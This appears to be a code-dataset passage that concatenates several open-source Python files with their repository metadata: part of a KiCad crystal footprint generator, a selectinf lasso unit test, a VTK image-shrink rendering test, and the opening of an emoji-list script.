myfile.write(" __objs__.append(obj)\n")
myfile.write("\nFreeCADGui.export(__objs__,os.path.split(doc.FileName)[0]+os.sep+\"{0}.wrl\")\n".format(fpname))
myfile.write("doc.saveCopy(os.path.split(doc.FileName)[0]+os.sep+\"{0}.FCStd\")\n".format(fpname))
myfile.write("print(\"created {0}\")\n".format(fpname))
desc = description
tag_s = tags
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
kicad_mod.setTags(tags)
offset = [0, 0]
if pad_style == "smd":
offset = [-rm / 2, -pad3pos[1]/2];
kicad_mod.setAttribute('smd')
kicad_modg = Translation(offset[0], offset[1])
kicad_mod.append(kicad_modg)
else:
kicad_modg = kicad_mod
# set general values
kicad_modg.append(
Text(type='reference', text='REF**', at=[l_slk - bev / 2 - txt_offset-extra_textoffset, t_crt + h_crt / 4], layer='F.SilkS',
rotation=90))
kicad_modg.append(
Text(type='value', text=fpname, at=[l_slk + w_slk + txt_offset+extra_textoffset + bev / 2, t_crt + h_crt / 4], layer='F.Fab',
rotation=90))
# create FAB-layer
kicad_modg.append(RectLine(start=[l_fab, t_fab],
end=[l_fab + w_fab, t_fab + h_fab], layer='F.Fab', width=lw_fab))
kicad_modg.append(PolygoneLine(polygone=[[l_fab + w_fab / 2 - pack_rm / 2, t_fab],
[0, t_fab/2],
[0, 0]], layer='F.Fab', width=lw_fab))
kicad_modg.append(PolygoneLine(polygone=[[l_fab + w_fab / 2 + pack_rm / 2, t_fab],
[rm, t_fab/2],
[rm, 0]], layer='F.Fab', width=lw_fab))
if package_pad and package_pad_add_holes:
kicad_modg.append(
Line(start=[pad3pos[0] - pad3dril_xoffset, pad3pos[1]], end=[pad3pos[0] + pad3dril_xoffset, pad3pos[1]],
layer='F.Fab', width=lw_fab))
if style == "hc49":
kicad_modg.append(RectLine(start=[l_fab - bev, t_fab], end=[l_fab + w_fab + bev, t_fab - lw_fab], layer='F.Fab',
width=lw_fab))
# create SILKSCREEN-layer
if package_pad and package_pad_add_holes:
kicad_modg.append(PolygoneLine(polygone=[[l_slk, pad3pos[1] - package_pad_drill_size[1] / 2 - slk_offset],
[l_slk, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk,
pad3pos[1] - package_pad_drill_size[1] / 2 - slk_offset]],
layer='F.SilkS', width=lw_slk))
else:
if slk_u_line:
kicad_modg.append(PolygoneLine(polygone=[[l_slk, t_slk + h_slk],
[l_slk, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, t_slk + h_slk]], layer='F.SilkS', width=lw_slk))
else:
kicad_modg.append(
RectLine(start=[l_slk, t_slk], end=[l_slk + w_slk, t_slk + h_slk], layer='F.SilkS', width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk / 2 - pack_rm / 2, t_slk], [0, max(t_slk/2,pad[1] / 2 + slk_offset)], [0, pad[1] / 2 + slk_offset]], layer='F.SilkS',width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk / 2 + pack_rm / 2, t_slk], [rm, max(t_slk/2,pad[1] / 2 + slk_offset)], [rm, pad[1] / 2 + slk_offset]], layer='F.SilkS',width=lw_slk))
if style == "hc49":
kicad_modg.append(
RectLine(start=[l_slk - bev, t_slk], end=[l_slk + w_slk + bev, t_slk - lw_slk], layer='F.SilkS',
width=lw_slk))
# create courtyard
kicad_mod.append(RectLine(start=[roundCrt(l_crt + offset[0]), roundCrt(t_crt + offset[1])],
end=[roundCrt(l_crt + w_crt + offset[0]), roundCrt(t_crt + h_crt + offset[1])],
layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_THT
pad_shape1 = Pad.SHAPE_CIRCLE
pad_layers = '*'
if pad_style == "smd":
kicad_modg.append(Pad(number=1, type=Pad.TYPE_SMT, shape=Pad.SHAPE_RECT, at=[0, 0], size=pad, drill=0,
layers=['F.Cu', 'F.Mask']))
kicad_modg.append(Pad(number=2, type=Pad.TYPE_SMT, shape=Pad.SHAPE_RECT, at=[rm, 0], size=pad, drill=0,
layers=['F.Cu', 'F.Mask']))
else:
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=[0, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=[rm, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
if package_pad:
kicad_modg.append(Pad(number=3, type=Pad.TYPE_SMT, shape=Pad.SHAPE_RECT, at=pad3pos,
size=[package_pad_size[1], package_pad_size[0]], drill=0, layers=['F.Cu', 'F.Mask']))
if package_pad_add_holes:
kicad_modg.append(
Pad(number=3, type=Pad.TYPE_THT, shape=Pad.SHAPE_RECT, at=[pad3pos[0] - pad3dril_xoffset, pad3pos[1]],
size=package_pad_drill_size, drill=package_pad_ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=3, type=Pad.TYPE_THT, shape=Pad.SHAPE_RECT, at=[pad3pos[0] + pad3dril_xoffset, pad3pos[1]],
size=package_pad_drill_size, drill=package_pad_ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
# +----------------------------------------------------+ ^
# / \ |
# / OOOOO OOOOO \ |
# | OOOOO OOOOO | pack_height
# \ OOOOO OOOOO / |
# \ / |
# +----------------------------------------------------+ v
# <-------------------------pack_width----------------------->
# <-------------rm------------------>
#
#
# pins=2,3
def makeCrystalHC49Vert(footprint_name, pins, rm, pad_size, ddrill, pack_width, pack_height, innerpack_width, innerpack_height,
description="Crystal THT", lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1], rotate3d=[0, 0, 0], addSizeFootprintName=False,
script3d="", height3d=10):
fpname = footprint_name
desc = description
tag_s = tags
if addSizeFootprintName:
fpname += "-{2}pin_w{0:2.1f}mm_h{1:2.1f}mm".format(pack_width, pack_height, pins)
desc = description + ", length*width={0:2.1f}x{1:2.1f}mm^2 package, package length={0:2.1f}mm, package width={1:2.1f}mm, {2} pins".format(pack_width, pack_height,pins)
tag_s = tags + " {0:2.1f}x{1:2.1f}mm^2 package length {0:2.1f}mm width {1:2.1f}mm {2} pins".format(pack_width, pack_height,pins)
if type(pad_size) is list:
pad = [pad_size[1], pad_size[0]]
else:
pad = [pad_size, pad_size]
centerpos=[rm/2,0]
pin1pos=[0,0]
pin2pos=[rm,0]
pin3pos = [rm / 2, 0]
if (pins==3):
pin2pos = [rm/2, 0]
pin3pos = [rm, 0]
w_fab = pack_width
h_fab = pack_height
l_fab = -(w_fab - rm) / 2
t_fab = -h_fab/2
iw_fab = innerpack_width
ih_fab = innerpack_height
il_fab = -(iw_fab - rm) / 2
it_fab = -ih_fab/2
incomplete_slk=False
h_slk = h_fab + 2 * slk_offset
w_slk = w_fab + 2 * slk_offset
l_slk = l_fab - slk_offset
t_slk = t_fab - slk_offset
l_crt=l_slk-crt_offset
t_crt=t_slk-crt_offset
w_crt=w_slk+2*crt_offset
h_crt = h_slk + 2 * crt_offset
if pack_width<rm+pad[0]:
l_crt = min(-pad[0]/2, l_fab) - crt_offset
w_crt = max(rm+pad[0], w_fab)+2*slk_offset
incomplete_slk = True
angle_slk=math.acos((pad[1]/2+slk_offset)/(h_slk/2))/3.1415*180
print(fpname)
if script3d!="":
with open(script3d, "a") as myfile:
myfile.write("\n\n # {0}\n".format(footprint_name))
myfile.write("import FreeCAD\n")
myfile.write("import os\n")
myfile.write("import os.path\n\n")
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '0.02')\n")
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("# W\nApp.ActiveDocument.Spreadsheet.set('B1', '{0}')\n".format(pack_width) )
myfile.write("# Wi\nApp.ActiveDocument.Spreadsheet.set('C1', '{0}')\n".format(innerpack_width) )
myfile.write("# H\nApp.ActiveDocument.Spreadsheet.set('B2', '{0}')\n".format(pack_height))
myfile.write("# Hi\nApp.ActiveDocument.Spreadsheet.set('C2', '{0}')\n".format(innerpack_height))
myfile.write("# height3d\nApp.ActiveDocument.Spreadsheet.set('B3', '{0}')\n".format(height3d))
myfile.write("# RM\nApp.ActiveDocument.Spreadsheet.set('B4', '{0}')\n".format(rm))
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '{0}')\n".format(ddrill-0.3))
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("doc = FreeCAD.activeDocument()\n")
myfile.write("__objs__=[]\n")
myfile.write("for obj in doc.Objects: \n")
myfile.write(" if obj.ViewObject.Visibility:\n")
myfile.write(" __objs__.append(obj)\n")
myfile.write("\nFreeCADGui.export(__objs__,os.path.split(doc.FileName)[0]+os.sep+\"{0}.wrl\")\n".format(fpname))
myfile.write("doc.saveCopy(os.path.split(doc.FileName)[0]+os.sep+\"{0}.FCStd\")\n".format(fpname))
myfile.write("print(\"created {0}\")\n".format(fpname))
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
kicad_mod.setTags(tags)
offset = [0, 0]
kicad_modg = kicad_mod
# set general values
kicad_modg.append(Text(type='reference', text='REF**', at=[centerpos[0], t_slk-txt_offset], layer='F.SilkS'))
kicad_modg.append(Text(type='value', text=fpname, at=[centerpos[0], t_slk+h_slk+txt_offset], layer='F.Fab'))
# create FAB-layer
THTQuartz(kicad_modg, [l_fab,t_fab], [w_fab,h_fab], 'F.Fab', lw_fab)
THTQuartz(kicad_modg, [il_fab,it_fab], [iw_fab,ih_fab], 'F.Fab', lw_fab)
# create SILKSCREEN-layer
if incomplete_slk:
THTQuartzIncomplete(kicad_modg, [l_slk, t_slk], [w_slk, h_slk], angle_slk, 'F.SilkS', lw_slk)
else:
THTQuartz(kicad_modg, [l_slk,t_slk], [w_slk,h_slk], 'F.SilkS', lw_slk)
# create courtyard
kicad_mod.append(RectLine(start=[roundCrt(l_crt + offset[0]), roundCrt(t_crt + offset[1])],
end=[roundCrt(l_crt + w_crt + offset[0]), roundCrt(t_crt + h_crt + offset[1])],
layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_THT
pad_shape1 = Pad.SHAPE_CIRCLE
pad_layers = '*'
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=pin1pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=pin2pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
if pins==3:
kicad_modg.append(Pad(number=3, type=pad_type, shape=pad_shape1, at=pin3pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
# +---------------------------------------+
# / \
# / \
# / \
# / OOOOO OOOOO \
# | OOOOO OOOOO |
# \ OOOOO OOOOO /
# \ /
# \ /
# \ /
# +--------------------------------------+
# <-----------------pack_diameter------------------>
# <-------------rm-------->
#
#
# pins=2,3
def makeCrystalRoundVert(footprint_name, rm, pad_size, ddrill, pack_diameter,
description="Crystal THT", lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1],
rotate3d=[0, 0, 0]):
fpname = footprint_name
if type(pad_size) is list:
pad = [pad_size[1], pad_size[0]]
else:
pad = [pad_size, pad_size]
centerpos = [rm / 2, 0]
pin1pos = [0, 0]
pin2pos = [rm, 0]
d_fab = pack_diameter
cl_fab = rm / 2
ct_fab = 0
d_slk = d_fab + 2 * slk_offset
cl_slk = cl_fab
ct_slk = ct_fab
sl_slk = 0
if d_fab >= rm + pad[0]:
st_slk = 0
sl_slk = min(-(d_fab - rm) / 2, - pad[0] / 2) - slk_offset
alpha_slk = 180
elif d_slk * d_slk / 4 >= rm * rm / 4:
st_slk = -max(math.sqrt(d_slk * d_slk / 4 - rm * rm / 4), pad[1] / 2 + slk_offset)
alpha_slk = 2 * (
90 - math.fabs(180 / 3.1415 * math.atan(math.fabs(st_slk - centerpos[1]) / math.fabs(sl_slk - centerpos[0]))))
else:
st_slk = -pad[1] / 2 - slk_offset
alpha_slk = 2 * (
90 - math.fabs(180 / 3.1415 * math.atan(math.fabs(st_slk - centerpos[1]) / math.fabs(sl_slk - centerpos[0]))))
d_crt = max(rm + pad[0], d_slk) + 2 * crt_offset
cl_crt = cl_fab
ct_crt = ct_fab
print(fpname)
desc = description
tag_s = tags
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
kicad_mod.setTags(tags)
offset = [0, 0]
kicad_modg = kicad_mod
# set general values
kicad_modg.append(
Text(type='reference', text='REF**', at=[centerpos[0], ct_slk - d_slk / 2 - txt_offset], layer='F.SilkS'))
kicad_modg.append(
Text(type='value', text=fpname, at=[centerpos[0], ct_slk + d_slk / 2 + txt_offset], layer='F.Fab'))
# create FAB-layer
kicad_mod.append(Circle(center=[cl_fab, ct_fab], radius=d_fab / 2, layer='F.Fab', width=lw_fab))
# create SILKSCREEN-layer
kicad_mod.append(
Arc(center=[cl_slk, ct_slk], start=[sl_slk, st_slk], angle=alpha_slk, layer='F.SilkS', width=lw_slk))
kicad_mod.append(
Arc(center=[cl_slk, ct_slk], start=[sl_slk, -st_slk], angle=-alpha_slk, layer='F.SilkS', width=lw_slk))
# create courtyard
kicad_mod.append(Circle(center=[cl_crt, ct_crt], radius=d_crt / 2, layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_THT
pad_shape1 = Pad.SHAPE_CIRCLE
pad_layers = '*'
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=pin1pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=pin2pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
|
pointhi/kicad-footprint-generator
|
scripts/tools/footprint_scripts_crystals.py
|
Python
|
gpl-3.0
| 45,603
|
[
"CRYSTAL"
] |
e2fdfc29c1024471588cb4a61d78f2a10301d50e7963692e683a74b25c0813f1
|
from __future__ import division, print_function
import numpy as np
import nose.tools as nt
import regreg.api as rr
from ..modelQ import modelQ
from ..lasso import lasso
from ...tests.instance import gaussian_instance
def test_modelQ():
n, p, s = 200, 50, 4
X, y, beta = gaussian_instance(n=n,
p=p,
s=s,
sigma=1)[:3]
lagrange = 5. * np.ones(p) * np.sqrt(n)
perturb = np.random.standard_normal(p) * n
LH = lasso.gaussian(X, y, lagrange)
LH.fit(perturb=perturb, solve_args={'min_its':1000})
LQ = modelQ(X.T.dot(X), X, y, lagrange)
LQ.fit(perturb=perturb, solve_args={'min_its':1000})
LQ.summary() # smoke test
conH = LH.sampler.affine_con
conQ = LQ.sampler.affine_con
np.testing.assert_allclose(LH.initial_soln, LQ.initial_soln)
np.testing.assert_allclose(LH.initial_subgrad, LQ.initial_subgrad)
np.testing.assert_allclose(conH.linear_part, conQ.linear_part)
np.testing.assert_allclose(conH.offset, conQ.offset)
np.testing.assert_allclose(LH._beta_full, LQ._beta_full)
|
selective-inference/selective-inference
|
selectinf/randomized/tests/test_modelQ.py
|
Python
|
bsd-3-clause
| 1,147
|
[
"Gaussian"
] |
e2165095504a9f5faf1254cb47397bf4b933111f45b5d8492aa4d603028b8ff4
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
=========================================================================
Program: Visualization Toolkit
Module: TestNamedColorsIntegration.py
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================
'''
import vtk
import vtk.test.Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestAllShrinks(vtk.test.Testing.vtkTest):
def testAllShrinks(self):
prefix = VTK_DATA_ROOT + "/Data/headsq/quarter"
renWin = vtk.vtkRenderWindow()
# Image pipeline
reader = vtk.vtkImageReader()
reader.SetDataExtent(0, 63, 0, 63, 1, 93)
reader.SetFilePrefix(prefix)
reader.SetDataByteOrderToLittleEndian()
reader.SetDataMask(0x7fff)
factor = 4
magFactor = 8
ops = ["Minimum", "Maximum", "Mean", "Median", "NoOp"]
shrink = dict()
mag = dict()
mapper = dict()
actor = dict()
imager = dict()
for operator in ops:
shrink.update({operator:vtk.vtkImageShrink3D()})
shrink[operator].SetMean(0)
if operator != "NoOp":
eval('shrink[operator].' + operator + 'On()')
shrink[operator].SetShrinkFactors(factor, factor, factor)
shrink[operator].SetInputConnection(reader.GetOutputPort())
mag.update({operator:vtk.vtkImageMagnify()})
mag[operator].SetMagnificationFactors(magFactor, magFactor, magFactor)
mag[operator].InterpolateOff()
mag[operator].SetInputConnection(shrink[operator].GetOutputPort())
mapper.update({operator:vtk.vtkImageMapper()})
mapper[operator].SetInputConnection(mag[operator].GetOutputPort())
mapper[operator].SetColorWindow(2000)
mapper[operator].SetColorLevel(1000)
mapper[operator].SetZSlice(45)
actor.update({operator:vtk.vtkActor2D()})
actor[operator].SetMapper(mapper[operator])
imager.update({operator:vtk.vtkRenderer()})
imager[operator].AddActor2D(actor[operator])
renWin.AddRenderer(imager[operator])
shrink["Minimum"].Update
shrink["Maximum"].Update
shrink["Mean"].Update
shrink["Median"].Update
imager["Minimum"].SetViewport(0, 0, .5, .33)
imager["Maximum"].SetViewport(0, .33, .5, .667)
imager["Mean"].SetViewport(.5, 0, 1, .33)
imager["Median"].SetViewport(.5, .33, 1, .667)
imager["NoOp"].SetViewport(0, .667, 1, 1)
renWin.SetSize(256, 384)
# render and interact with data
iRen = vtk.vtkRenderWindowInteractor()
iRen.SetRenderWindow(renWin);
renWin.Render()
img_file = "TestAllShrinks.png"
vtk.test.Testing.compareImage(iRen.GetRenderWindow(), vtk.test.Testing.getAbsImagePath(img_file), threshold=25)
vtk.test.Testing.interact()
if __name__ == "__main__":
vtk.test.Testing.main([(TestAllShrinks, 'test')])
|
hlzz/dotfiles
|
graphics/VTK-7.0.0/Imaging/Core/Testing/Python/TestAllShrinks.py
|
Python
|
bsd-3-clause
| 3,535
|
[
"VTK"
] |
f95ebad0ce6d5b41e10d76474f1d0bc219e46f7f42fa1375f572cb9135f22daa
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from subprocess import Popen, PIPE
emojis="""⛑🏻 Helmet With White Cross, Type-1-2
⛑🏼 Helmet With White Cross, Type-3
⛑🏽 Helmet With White Cross, Type-4
⛑🏾 Helmet With White Cross, Type-5
⛑🏿 Helmet With White Cross, Type-6
💏🏻 Kiss, Type-1-2
💏🏼 Kiss, Type-3
💏🏽 Kiss, Type-4
💏🏾 Kiss, Type-5
💏🏿 Kiss, Type-6
💑🏻 Couple With Heart, Type-1-2
💑🏼 Couple With Heart, Type-3
💑🏽 Couple With Heart, Type-4
💑🏾 Couple With Heart, Type-5
💑🏿 Couple With Heart, Type-6
⛷🏻 Skier, Type-1-2
⛷🏼 Skier, Type-3
⛷🏽 Skier, Type-4
⛷🏾 Skier, Type-5
⛷🏿 Skier, Type-6
😀 Grinning Face
😁 Grinning Face With Smiling Eyes
😂 Face With Tears of Joy
🤣 Rolling on the Floor Laughing
😃 Smiling Face With Open Mouth
😄 Smiling Face With Open Mouth & Smiling Eyes
😅 Smiling Face With Open Mouth & Cold Sweat
😆 Smiling Face With Open Mouth & Closed Eyes
😉 Winking Face
😊 Smiling Face With Smiling Eyes
😋 Face Savouring Delicious Food
😎 Smiling Face With Sunglasses
😍 Smiling Face With Heart-Eyes
😘 Face Blowing a Kiss
😗 Kissing Face
😙 Kissing Face With Smiling Eyes
😚 Kissing Face With Closed Eyes
☺ Smiling Face
🙂 Slightly Smiling Face
🤗 Hugging Face
🤩 Star-Struck
🤔 Thinking Face
🤨 Face With Raised Eyebrow
😐 Neutral Face
😑 Expressionless Face
😶 Face Without Mouth
🙄 Face With Rolling Eyes
😏 Smirking Face
😣 Persevering Face
😥 Disappointed but Relieved Face
😮 Face With Open Mouth
🤐 Zipper-Mouth Face
😯 Hushed Face
😪 Sleepy Face
😫 Tired Face
😴 Sleeping Face
😌 Relieved Face
😛 Face With Stuck-Out Tongue
😜 Face With Stuck-Out Tongue & Winking Eye
😝 Face With Stuck-Out Tongue & Closed Eyes
🤤 Drooling Face
😒 Unamused Face
😓 Face With Cold Sweat
😔 Pensive Face
😕 Confused Face
🙃 Upside-Down Face
🤑 Money-Mouth Face
😲 Astonished Face
☹ Frowning Face
🙁 Slightly Frowning Face
😖 Confounded Face
😞 Disappointed Face
😟 Worried Face
😤 Face With Steam From Nose
😢 Crying Face
😭 Loudly Crying Face
😦 Frowning Face With Open Mouth
😧 Anguished Face
😨 Fearful Face
😩 Weary Face
🤯 Exploding Head
😬 Grimacing Face
😰 Face With Open Mouth & Cold Sweat
😱 Face Screaming in Fear
😳 Flushed Face
🤪 Crazy Face
😵 Dizzy Face
😡 Pouting Face
😠 Angry Face
🤬 Face With Symbols Over Mouth
😷 Face With Medical Mask
🤒 Face With Thermometer
🤕 Face With Head-Bandage
🤢 Nauseated Face
🤮 Face Vomiting
🤧 Sneezing Face
😇 Smiling Face With Halo
🤠 Cowboy Hat Face
🤡 Clown Face
🤥 Lying Face
🤫 Shushing Face
🤭 Face With Hand Over Mouth
🧐 Face With Monocle
🤓 Nerd Face
😈 Smiling Face With Horns
👿 Angry Face With Horns
👹 Ogre
👺 Goblin
💀 Skull
☠ Skull and Crossbones
👻 Ghost
👽 Alien
👾 Alien Monster
🤖 Robot Face
💩 Pile of Poo
😺 Smiling Cat Face With Open Mouth
😸 Grinning Cat Face With Smiling Eyes
😹 Cat Face With Tears of Joy
😻 Smiling Cat Face With Heart-Eyes
😼 Cat Face With Wry Smile
😽 Kissing Cat Face With Closed Eyes
🙀 Weary Cat Face
😿 Crying Cat Face
😾 Pouting Cat Face
🙈 See-No-Evil Monkey
🙉 Hear-No-Evil Monkey
🙊 Speak-No-Evil Monkey
👶 Baby
👶🏻 Baby: Light Skin Tone
👶🏼 Baby: Medium-Light Skin Tone
👶🏽 Baby: Medium Skin Tone
👶🏾 Baby: Medium-Dark Skin Tone
👶🏿 Baby: Dark Skin Tone
🧒 Child
🧒🏻 Child: Light Skin Tone
🧒🏼 Child: Medium-Light Skin Tone
🧒🏽 Child: Medium Skin Tone
🧒🏾 Child: Medium-Dark Skin Tone
🧒🏿 Child: Dark Skin Tone
👦 Boy
👦🏻 Boy: Light Skin Tone
👦🏼 Boy: Medium-Light Skin Tone
👦🏽 Boy: Medium Skin Tone
👦🏾 Boy: Medium-Dark Skin Tone
👦🏿 Boy: Dark Skin Tone
👧 Girl
👧🏻 Girl: Light Skin Tone
👧🏼 Girl: Medium-Light Skin Tone
👧🏽 Girl: Medium Skin Tone
👧🏾 Girl: Medium-Dark Skin Tone
👧🏿 Girl: Dark Skin Tone
🧑 Adult
🧑🏻 Adult: Light Skin Tone
🧑🏼 Adult: Medium-Light Skin Tone
🧑🏽 Adult: Medium Skin Tone
🧑🏾 Adult: Medium-Dark Skin Tone
🧑🏿 Adult: Dark Skin Tone
👨 Man
👨🏻 Man: Light Skin Tone
👨🏼 Man: Medium-Light Skin Tone
👨🏽 Man: Medium Skin Tone
👨🏾 Man: Medium-Dark Skin Tone
👨🏿 Man: Dark Skin Tone
👩 Woman
👩🏻 Woman: Light Skin Tone
👩🏼 Woman: Medium-Light Skin Tone
👩🏽 Woman: Medium Skin Tone
👩🏾 Woman: Medium-Dark Skin Tone
👩🏿 Woman: Dark Skin Tone
🧓 Older Adult
🧓🏻 Older Adult: Light Skin Tone
🧓🏼 Older Adult: Medium-Light Skin Tone
🧓🏽 Older Adult: Medium Skin Tone
🧓🏾 Older Adult: Medium-Dark Skin Tone
🧓🏿 Older Adult: Dark Skin Tone
👴 Old Man
👴🏻 Old Man: Light Skin Tone
👴🏼 Old Man: Medium-Light Skin Tone
👴🏽 Old Man: Medium Skin Tone
👴🏾 Old Man: Medium-Dark Skin Tone
👴🏿 Old Man: Dark Skin Tone
👵 Old Woman
👵🏻 Old Woman: Light Skin Tone
👵🏼 Old Woman: Medium-Light Skin Tone
👵🏽 Old Woman: Medium Skin Tone
👵🏾 Old Woman: Medium-Dark Skin Tone
👵🏿 Old Woman: Dark Skin Tone
👨⚕️ Man Health Worker
👨🏻⚕️ Man Health Worker: Light Skin Tone
👨🏼⚕️ Man Health Worker: Medium-Light Skin Tone
👨🏽⚕️ Man Health Worker: Medium Skin Tone
👨🏾⚕️ Man Health Worker: Medium-Dark Skin Tone
👨🏿⚕️ Man Health Worker: Dark Skin Tone
👩⚕️ Woman Health Worker
👩🏻⚕️ Woman Health Worker: Light Skin Tone
👩🏼⚕️ Woman Health Worker: Medium-Light Skin Tone
👩🏽⚕️ Woman Health Worker: Medium Skin Tone
👩🏾⚕️ Woman Health Worker: Medium-Dark Skin Tone
👩🏿⚕️ Woman Health Worker: Dark Skin Tone
👨🎓 Man Student
👨🏻🎓 Man Student: Light Skin Tone
👨🏼🎓 Man Student: Medium-Light Skin Tone
👨🏽🎓 Man Student: Medium Skin Tone
👨🏾🎓 Man Student: Medium-Dark Skin Tone
👨🏿🎓 Man Student: Dark Skin Tone
👩🎓 Woman Student
👩🏻🎓 Woman Student: Light Skin Tone
👩🏼🎓 Woman Student: Medium-Light Skin Tone
👩🏽🎓 Woman Student: Medium Skin Tone
👩🏾🎓 Woman Student: Medium-Dark Skin Tone
👩🏿🎓 Woman Student: Dark Skin Tone
👨🏫 Man Teacher
👨🏻🏫 Man Teacher: Light Skin Tone
👨🏼🏫 Man Teacher: Medium-Light Skin Tone
👨🏽🏫 Man Teacher: Medium Skin Tone
👨🏾🏫 Man Teacher: Medium-Dark Skin Tone
👨🏿🏫 Man Teacher: Dark Skin Tone
👩🏫 Woman Teacher
👩🏻🏫 Woman Teacher: Light Skin Tone
👩🏼🏫 Woman Teacher: Medium-Light Skin Tone
👩🏽🏫 Woman Teacher: Medium Skin Tone
👩🏾🏫 Woman Teacher: Medium-Dark Skin Tone
👩🏿🏫 Woman Teacher: Dark Skin Tone
👨⚖️ Man Judge
👨🏻⚖️ Man Judge: Light Skin Tone
👨🏼⚖️ Man Judge: Medium-Light Skin Tone
👨🏽⚖️ Man Judge: Medium Skin Tone
👨🏾⚖️ Man Judge: Medium-Dark Skin Tone
👨🏿⚖️ Man Judge: Dark Skin Tone
👩⚖️ Woman Judge
👩🏻⚖️ Woman Judge: Light Skin Tone
👩🏼⚖️ Woman Judge: Medium-Light Skin Tone
👩🏽⚖️ Woman Judge: Medium Skin Tone
👩🏾⚖️ Woman Judge: Medium-Dark Skin Tone
👩🏿⚖️ Woman Judge: Dark Skin Tone
👨🌾 Man Farmer
👨🏻🌾 Man Farmer: Light Skin Tone
👨🏼🌾 Man Farmer: Medium-Light Skin Tone
👨🏽🌾 Man Farmer: Medium Skin Tone
👨🏾🌾 Man Farmer: Medium-Dark Skin Tone
👨🏿🌾 Man Farmer: Dark Skin Tone
👩🌾 Woman Farmer
👩🏻🌾 Woman Farmer: Light Skin Tone
👩🏼🌾 Woman Farmer: Medium-Light Skin Tone
👩🏽🌾 Woman Farmer: Medium Skin Tone
👩🏾🌾 Woman Farmer: Medium-Dark Skin Tone
👩🏿🌾 Woman Farmer: Dark Skin Tone
👨🍳 Man Cook
👨🏻🍳 Man Cook: Light Skin Tone
👨🏼🍳 Man Cook: Medium-Light Skin Tone
👨🏽🍳 Man Cook: Medium Skin Tone
👨🏾🍳 Man Cook: Medium-Dark Skin Tone
👨🏿🍳 Man Cook: Dark Skin Tone
👩🍳 Woman Cook
👩🏻🍳 Woman Cook: Light Skin Tone
👩🏼🍳 Woman Cook: Medium-Light Skin Tone
👩🏽🍳 Woman Cook: Medium Skin Tone
👩🏾🍳 Woman Cook: Medium-Dark Skin Tone
👩🏿🍳 Woman Cook: Dark Skin Tone
👨🔧 Man Mechanic
👨🏻🔧 Man Mechanic: Light Skin Tone
👨🏼🔧 Man Mechanic: Medium-Light Skin Tone
👨🏽🔧 Man Mechanic: Medium Skin Tone
👨🏾🔧 Man Mechanic: Medium-Dark Skin Tone
👨🏿🔧 Man Mechanic: Dark Skin Tone
👩🔧 Woman Mechanic
👩🏻🔧 Woman Mechanic: Light Skin Tone
👩🏼🔧 Woman Mechanic: Medium-Light Skin Tone
👩🏽🔧 Woman Mechanic: Medium Skin Tone
👩🏾🔧 Woman Mechanic: Medium-Dark Skin Tone
👩🏿🔧 Woman Mechanic: Dark Skin Tone
👨🏭 Man Factory Worker
